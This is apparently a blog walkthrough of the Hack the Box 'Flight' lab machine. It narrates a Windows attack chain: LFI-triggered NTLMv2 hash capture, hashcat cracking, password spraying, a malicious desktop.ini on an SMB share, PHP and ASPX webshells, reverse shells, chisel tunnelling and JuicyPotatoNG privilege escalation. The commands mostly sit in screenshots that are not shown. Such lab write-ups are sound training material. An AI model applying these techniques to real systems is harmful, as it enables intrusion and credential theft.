In this post, I would like to share a walkthrough of the Flight Machine from Hack the Box
This room will be considered a Hard machine on Hack the Box
What will you gain from the Flight machine?
For the user flag, you will need to retrieve the Net NTLMv2 hashes, and we should be able to get a plaintext password by using the hashcat tools. I will be using crackmapexec to execute some method of password spray which to locate another user that might use the same password. We also can write access to a share which we should be able to drop a malicious file on the SMB shares.
As for the root flag, you need to authenticate on the network as the machine account which we can upload a Simple WebShell ASPX to execute some command injection which we should obtain a shell connection back to us. We also can use the JuicyPotatoNG exploitation to obtain a root shell
Information Gathering on Flight Machine
Once we have started the VPN connection which requires a download from Hackthebox, we can start the information gathering on the machine by executing the command nmap -sC -sV -p- <IP Address> -PN
Let’s access the website interface
However, the website interface looks like an airlines type of website
Let’s enumerate the directory by using the gobuster tool but it’s nothing looks interesting at all.
As a result, let’s enumerate some subdomains that might help us with further escalation.
Let’s see the subdomain of the website which looks like it’s nothing, but the language seems to “latin“
When trying to access the “About Us” where it might be vulnerable to a Local File Inclusion attack
Therefore, let’s try to test by entering “index.php” and the page look a little bit off.
The website has detected a “Suspicious Activity Blocked”
As a result, let’s start our Responder so that we can retrieve
We also need to start our smbserver as shown above.
Let’s retrieve the hash by executing the command above.
Finally, we managed to retrieve the hash as expected.
While using hashcat tool, we managed to obtain the password from the hashes.
Using Crackmapexec for Flight machine from our attacker’s machine
My Operating System doesn’t have crackmapexec for some reason so let’s install it on our machine. Sadly, the tool cannot be installed at all.
After a while of troubleshooting, i give up using the crackmapexec on Parrot OS and changed to using Kali Linux for this activity only.
The screenshot above shows the process of crackmapexec and let’s move back to our parrot os machine.
The command above shows the shares that the user has on the machine.
From the result, let’s access one of the shares that svc_apache has permission
Let’s access the Shared using the credentials of S.Moon and we see nothing
Using impacket-smbexec, we can find out which share is writable. But there seems to be customized code that prevents a lot of file types to be written:
As a result, we can create a fake desktop.ini file which we can put the file into the server via smbclient
Therefore, we can insert the file by running the command “put desktop.ini”
We crack the new hash and get the C.Bum password
At least, we got the password for the c.bum
By using a similar method, we added a simple_backdoor.php on the machine via c.bum access
The content of the file would be something such as the above.
Let’s start our Python server
We managed to transfer the file to the server using the Python server
Finally, we have successfully the machine via the reverse shell connection
Again, we need to start our Python server using a different port
Therefore, let’s start our nc listener
As a result, the file “RunasCS.exe” have been downloaded on the machine.
Let’s run the command above to retrieve the reverse shell connection
Finally, we have succeeded to obtain the connection to us.
Access as c.bum privileges
We can read the user flag by using the command “type user.txt“
Escalate to Admin Privileges Access on Flight Machine
Let’s check the port that is available on the server
Let’s transfer the “chisel” into the victim’s machine
On the attacker’s machine, we need to execute the command above.
On the other side, we are required to execute the command above.
The website will look something as shown in the screenshot above.
Let’s find the webshell on the internet
As a result, we need to upload the cmdasp.aspx on the victim’s machine
We need to transfer the file to the c:\inetpub\development\
We can verify that the file is stored there by looking inside the directory
Another step to ensure the cmdasp works, we need to execute the certutil.exe
Uwu! It works as I expected
Let’s start our nc listener
Let’s enter the command so that we will be able to obtain the reserve shell connection.
Therefore, let’s upload nc.exe onto the victim’s machine
Let’s use a different cmd interface
It looks like it works but the connection dies after a while.
After a few tries, we finally managed to retrieve the reverse shell connection
From the privileges information shown in the screenshot above, we are fully aware that JuicyPotato is vulnerable
As a result, let’s download JuicyPotatoNg into the victim’s machine
For us to obtain the nt authority\system privileges access, we need to execute the command above
Boom! We have success in the process
We can read the root flag by typing the command “type root.txt”